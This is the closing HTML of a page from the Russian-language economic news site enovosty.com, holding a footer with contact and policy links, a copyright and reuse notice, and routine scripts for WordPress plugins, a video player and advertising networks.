head.appendChild(script);</script></div> end NEW_content_v1 for enovosty.com --><div class="cls"></div><br> <div id="footer"> <div class="wiget text" style="padding-right:0; margin-right:0;" > <div id="bottom-menu" style="background: #F93; height:40px"> <a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/newsitemap">Карта сайта</a> </div> <div id="counters" > </div> <div id="textfooter"> <p>2018 &copy; "Экономические новости"</p> <p>Все права защищены. </p><p>Использование материалов разрешается при условии ссылки на <a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a> (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p> </div>  <a href="/contacts" target="_blank" rel="nofollow" style="
float: right;
font-weight: bold;
color: #369;
padding: 10px;
">Размещение рекламы</a> </div> </div> <div class="links_bal"> </div></div><script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script><div id="error-notification-id" class="enp-4837426"></div><div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div> <script>var isProcessing = false;function alter_ul_post_values(obj,post_id,ul_type){if (isProcessing)
return;isProcessing = true;jQuery(obj).find("span").html("..");jQuery.ajax({type: "POST",url: window.location.origin + "/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",data: "post_id="+post_id+"&up_type="+ul_type,success: function(msg){jQuery(obj).find("span").html(msg);isProcessing = false;}});}</script> <script type='text/javascript'>
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/ajax-comment-loading/js/google-acl2.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/js/url-span.js'></script><script type='text/javascript'>
var socialWarfare = {"addons":[],"post_id":"4837426","floatBeforeContent":""};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/social-warfare/assets/js/script.min.js'></script><script type='text/javascript' src='//imasdk.googleapis.com/js/sdkloader/ima3.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/video.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ads.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ima.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/comment-reply.min.js'></script><script type="text/javascript"> var swp_nonce = "cf8c677c9c";var swpFloatBeforeContent = false;var swpClickTracking = false;</script><script>//new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});//new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});//new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
</script><script>document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
</script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script><script>//var pollsL10n = document.getElementById('pollsL10n');
</script><!--<script type="text/javascript">admixerML.fn.push(function () {admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',i: 'inv-nets'
});admixerML.singleRequest();});</script>--><div class="container"><div id="div-gpt-ad-1595961600637-0"><script>catfish('div-gpt-ad-1595961600637-0')
</script></div></div><!--<script type="text/javascript" charset="utf-8">(function(d,s){var o=d.createElement(s);o.async=true;o.type="text/javascript";o.charset="utf-8";if (location.protocol == "https:")
{ o.src="https://js-ru.redtram.com/n4p/0/30/ticker_30546.js"; }else
{ o.src="https://js.ru.redtram.com/n4p/0/30/ticker_30546.js"; }var x=d.getElementsByTagName(s)[0];x.parentNode.insertBefore(o,x);})(document,"script");</script>
--><script>jQuery(document).ready(function($){setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);});</script><script type="text/javascript" src="https://affiliate.ria.com/js/ria_informer.js?riacode=e77f01cd5a912b7be06984da8aae869f" ></script><div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div> <iframe name="n01212138" style="display:none"></iframe><script>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</script><script>var player = videojs('my-player', {responsive: true
});

</script><script type="text/javascript">if (typeof window._tx === "undefined") {var s = document.createElement("script");s.type = "text/javascript";s.async = true;s.src = "//st.hbrd.io/ssp.js";
(document.getElementsByTagName("head")[0] ||
document.getElementsByTagName("body")[0]).appendChild(s);}window._tx = window._tx || {};window._tx.cmds = window._tx.cmds || [];window._tx.cmds.push(function () {window._tx.init();});</script></body></html>